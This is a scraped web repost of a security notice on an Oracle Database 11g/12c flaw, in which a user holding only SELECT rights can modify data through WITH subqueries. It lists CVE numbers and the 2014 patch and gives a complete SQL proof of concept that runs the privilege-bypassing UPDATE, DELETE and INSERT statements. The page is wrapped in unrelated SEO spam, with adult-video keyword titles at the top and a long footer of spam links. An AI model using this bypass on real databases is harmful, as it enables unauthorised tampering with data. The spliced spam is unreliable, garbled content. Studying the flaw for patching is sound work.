a亚洲精品_精品国产91乱码一区二区三区_亚洲精品在线免费观看视频_欧美日韩亚洲国产综合_久久久久久久久久久成人_在线区

首頁 > 數(shù)據(jù)庫 > Oracle > 正文

【ORACLE】Oracle11g,12c 高危漏洞

2024-08-29 13:54:29
字體:
來源:轉載
供稿:網友
【性質】高危漏洞【危害】僅有查詢權限的用戶可以對數(shù)據(jù)進行增、刪、改操作【影響范圍】廣泛,包括11.2.0.3,11.2.0.4,12.1等版本(10g版本不包含)。【修復】2014年7月的CPU中被修正,強烈建議您檢查所有Oracle數(shù)據(jù)庫,確認是否存在該安全風險。與此有關的CVE號包括:CVE-2013-3751、CVE-2014-4236、CVE-2014-4237、CVE-2014-4245、CVE-2013-3774 .相關信息還可以參考Oracle的CPU頁面:http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html【bug test】--100.95 Oracle Database 11g EnterPRise Edition Release 11.2.0.3.0 - 64bitSQL> conn ncv502/ncv502create user test identified by test;grant create session to test;create table t (ID number(4)); insert into t(ID) values(1); select * from t;grant select on t to test;SQL> conn test/testselect * from ncv502.t;update ncv502.t set id = 1 where id = 1; *第 1 行出現(xiàn)錯誤:ORA-01031: 權限不足--在WITH語句中,權限限制被完全繞過,增刪改權限被獲得SQL> update (with tmp as (select id from ncv502.t) select id from tmp) set id = 0 where id = 1;1 row updated.SQL> commit;Commit complete.SQL> delete (with temp as (select * from ncv502.t) select id from temp) where id = 0;1 row deleted.SQL> insert into (with temp as (select * from ncv502.t) select * from temp) select 2 from dual;1 row created.drop table t purge ;drop user test cascade;--71 Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit 沒有該bug
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 国产欧美精品区一区二区三区 | 影音先锋中文字幕在线 | 国产午夜精品视频 | 成人精品久久久 | 国产猛男猛女超爽免费视频网站 | 日韩aⅴ影视 | 日韩中文视频 | 国产素人视频 | 噜噜噜噜狠狠狠7777视频 | 日韩成人精品在线 | 蜜月久久99静品久久久久久 | 五月天黄色网 | 国产精品色在线网站 | 天天久久婷婷 | 国产一区二区在线播放 | 国产精品视频男人的天堂 | 中文字幕久久精品 | 亚洲国产婷婷 | 国产精品视频久久久 | 精品国产乱码久久久久久闺蜜 | 国产成人在线免费观看 | 日本二区在线观看 | 日韩精品在线免费 | 亚洲成人在线观看视频 | 亚洲成av人片一区二区三区 | 九九免费视频 | 久久久久久久久久久久久九 | 久久4| 国产成人福利 | 最新av网址大全 | 日本日韩中文字幕 | 久久久国产视频 | 啪啪免费小视频 | 一区二区中文字幕 | 久久黑人| 91精品国产综合久久久久久丝袜 | 一区色 | 99国产精品99久久久久久 | 免费一级欧美在线观看视频 | 日本亚洲精品一区二区三区 | 91免费看片 |